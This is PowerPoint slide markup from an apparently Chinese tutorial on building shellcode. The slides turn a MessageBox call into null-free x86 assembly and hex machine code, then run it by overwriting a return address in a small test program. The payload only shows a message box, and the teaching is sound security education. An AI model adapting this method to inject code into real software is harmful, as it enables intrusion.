              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN"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"windows.h"</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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00"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>[]){</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="795E26"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRP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MessageBox</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NULL</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NULL</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NULL</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endParaRPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="AF00DB"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRP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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EC2795D-142D-F038-084F-B9ED1D4E0BE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7176120" y="3634847"/>
            <a:ext cx="3389042" cy="2015350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="920047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406971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>利用调试功能，找到其对应的汇编代码。</a:t>
            </a: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185761"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第二步：换成对应的汇编代码</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CDDF49DA-BD18-CC05-32B0-B915181FB356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384033" y="1844825"/>
            <a:ext cx="4968552" cy="3651150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4967FC-74B9-646C-EEDC-134968510A5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7183023" y="4149080"/>
            <a:ext cx="4169562"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对应汇编代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224384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3523209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>利用调试功能，找到其对应的汇编代码。</a:t>
            </a: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sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>直接得到的汇编语言通常需要进行再加工。对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>push 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>而言，可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xor ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>之后执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>push ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>来实现。</a:t>
            </a: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a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>push 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的机器码会出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，会造成字符串读取截断。</a:t>
            </a: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185761"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第二步：换成对应的汇编代码</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对应汇编代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACD61008-3DEB-E6A2-6EA9-0B8B2DAD24C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384031" y="1653494"/>
            <a:ext cx="5041203" cy="4031873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN"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A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"windows.h"</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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LoadLibrary</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"user32.dll"</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    _asm</a:t>
            </a:r>
          </a:p>
          <a:p>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xor ebx,ebx</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push ebx</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push ebx</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push ebx</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push ebx</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mov eax, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0x7E4507EA</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call eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>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5373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1445717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在第一行汇编代码处打断点，利用调试定位具体内存中的地址。</a:t>
            </a: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4185761"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第三步：换成对应的机器代码</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对应机器代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC19201E-F5A3-20CE-E719-3AAB3E26AFBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6449808" y="1844824"/>
            <a:ext cx="4864100" cy="3479800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72E9E70A-D709-6936-49D8-0F975A6455F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6666156" y="2021351"/>
            <a:ext cx="936104" cy="1654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44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753220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>验证提取的机器代码能否正常运行。</a:t>
            </a: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326243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第四步：调试机器代码</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验证机器代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CEECDBB-E6BF-D4BA-CAF8-F9B953764FC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6456040" y="1653763"/>
            <a:ext cx="4824536" cy="3693319"/>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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>windows.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&gt;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ourshellcode</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\x33\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>\x53\x53\x53\x53\xB8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xEA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>\x07\x45\x7E\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>\xD0</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LoadLibrary</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"user32.dll"</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*ret;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ret=(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*)&amp;ret+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(*ret)=(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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ourshellcode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01406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编写</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2830711"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>UltraEdit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>得到任意字符串的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>举例</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 altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>“hello world” ASCII</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码为：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 altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64</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357020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第五步：构造任意字符串</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汇编代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CEECDBB-E6BF-D4BA-CAF8-F9B953764FC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6456040" y="1653763"/>
            <a:ext cx="4824536" cy="4185761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
